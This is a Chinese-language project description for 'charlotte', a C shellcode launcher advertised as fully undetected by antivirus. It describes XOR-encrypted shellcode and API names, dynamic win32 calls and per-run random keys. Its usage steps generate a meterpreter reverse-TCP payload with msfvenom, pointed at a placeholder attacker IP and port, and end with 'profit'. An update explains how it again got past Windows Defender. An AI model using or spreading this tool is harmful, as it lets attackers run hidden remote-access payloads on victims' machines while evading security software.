2021年5月13日:
- c shellcode启动器,截至2021年5月13日完全未检测到0/26。
- 动态调用win32 api函数
- Shellcode和函数名称的XOR加密
- 每次运行随机XOR键和变量
- 在Kali Linux上,只需“ apt-get install mingw-w64 *”就可以了!
2021年5月17日:
1.随机字符串长度和XOR键长度
用法
git克隆存储库,使用beacon.bin命名生成您的shellcode文件,然后运行charlotte.py
例子:
- git clone https://github.com/9emin1/charlotte.git && apt-get install mingw-w64*
- cd charlotte
- msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=YOUR_IP LPORT=YOUR_PORT -f raw > beacon.bin
- python charlotte.py
- profit
更新v1.1
2021/05/21:
显然,Microsoft Windows Defender能够检测到.DLL二进制文件,以及他们如何标记它?通过寻找几个16字节大小的XOR键将其更改为以下POC .gif中显示的9表示现在再次未被检测到。
项目地址:
https://github.com/9emin1/charlotte
